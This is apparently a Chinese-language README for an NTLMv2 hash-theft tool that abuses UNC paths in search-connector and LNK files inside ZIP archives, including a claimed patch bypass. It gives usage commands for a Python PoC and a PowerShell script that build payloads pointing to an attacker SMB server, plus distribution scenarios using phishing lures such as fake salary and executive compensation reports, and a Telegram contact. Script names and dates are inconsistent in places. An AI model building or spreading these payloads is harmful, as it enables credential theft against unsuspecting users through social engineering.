点击上方图片观看漏洞演示
根本安全问题在于 Windows Shell 在预览操作期间自动处理特定文件格式中嵌入的 UNC 路径。当用户打开包含特制文件的 ZIP 存档时,Windows 资源管理器会在未经用户同意的情况下自动解析 UNC 路径,启动 SMB 身份验证尝试,并将 NTLMv2-SSP 哈希暴露给攻击者控制的服务器。
文件: ntlm-disclosure-poc.py
该初始实现利用了 Windows Search Connector(.searchConnector-ms)文件,这些文件是基于 XML 的配置文件,用于定义 Windows 资源管理器的搜索位置。当 Windows 在 ZIP 存档预览操作期间自动处理 simpleLocation 元素中嵌入的 UNC 路径时,便会触发该漏洞。
技术特点:
searchConnectorDescription 元素中嵌入 UNC 路径文件: patch_bypass.ps1
这种增强技术利用了 LNK 文件属性,以应对 Microsoft 的初始补丁。该攻击利用 Windows 资源管理器在 ZIP 文件预览期间获取图标元数据和解析目标路径的行为,同时通过仔细配置属性来保持零点击利用向量。
技术特点:
TargetPath 属性中包含 UNC 路径的 LNK 文件3.6+colorama5.1+Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser# 基本用法
python ntml-disclosure-poc.py 192.168.1.100
# 自定义输出文件
python ntml-disclosure-poc.py 192.168.1.100 -o some_data.zip
# 输出示例
[+] Listener: 192.168.1.100
[*] Resource path: \\192.168.1.100\sharedir
[*] COMPLETE Package: Project_20241125_143022.zip
[*] Output: PATH\Project_20251123_175037.zip
参数
target(必需):目标 IP 地址或主机名
-o, --output:ZIP 包的自定义输出文件名
# 基本用法 - 自动删除 LNK 文件
.\bypass.ps1 -IP 192.168.1.100
# 保留 LNK 文件用于外部分发
.\bypass.ps1 -IP 192.168.1.100 -KeepLnk
# 自定义诱饵名称和共享
.\bypass.ps1 -IP 192.168.1.100 -Share documents -File budget.xlsx -Lure FileName -KeepLnk
# 指定输出目录
.\bypass.ps1 -IP 192.168.1.100 -OutDir "C:\Payloads" -KeepLnk
参数
-IP(必需):目标 SMB 服务器 IP 地址
-Share:SMB 共享名称(默认:'share')
-File:目标文件名(默认:'payload.exe')
-Lure:社会工程诱饵文件名(默认:'Your_File_For_Payload_Here')
-OutDir:输出目录(默认:当前目录)
-KeepLnk:在创建 ZIP 后保留 LNK 文件
graph TD
A[🔴 CVE-2025-24054<br/>初始漏洞] --> B[🛡️ Microsoft 补丁]
B --> C[🟠 CVE-2025-50154<br/>绕过 #1]
C --> D[🛡️ Microsoft 补丁]
D --> E[🟡 CVE-2025-59214<br/>绕过 #2]
E --> F[🔴 当前状态<br/>活跃利用]
style A fill:#ffcccc
style C fill:#ffddcc
style E fill:#ffffcc
style F fill:#ccffcc📨 场景 1:直接 ZIP 分发
# 创建 ZIP 有效载荷
.\bypass.ps1 -IP 192.168.1.100 -Lure "Salary_Report_Q4_2025"
# 分发向量:
# - 📧 带有社会工程诱饵的电子邮件附件
# - ☁️ 被攻破的文件共享服务
# - 🌐 企业环境中的网络共享投放
🔄 场景 2:LNK 文件传输
# 创建并保留 LNK 文件以进行多主机部署
.\bypass.ps1 -IP 192.168.1.100 -Lure "Project_Documentation" -KeepLnk
# 跨主机部署:
copy-item "Project_Documentation.lnk" "\\remote-server\share\"
# 通过被攻破网站进行网络分发
🎯 场景 3:定向社会工程
.\bypass.ps1 -IP 192.168.1.100 -Share "HR_Documents" -File "compensation_review.xlsx" -Lure "Executive_Compensation_2025" -KeepLnk
- 群组与联系方式:t.me/initial_persistence
- 邮箱:[email protected]
| 向量 | 触发机制 | 用户交互 | 补丁状态 |
|---|
| 🔗 SearchConnector | XML 解析 + UNC 解析 | 打开 ZIP | 🛡️ 已修补 |
| 📎 LNK TargetPath | 图标元数据获取 | 打开 ZIP | 🔴 活跃 |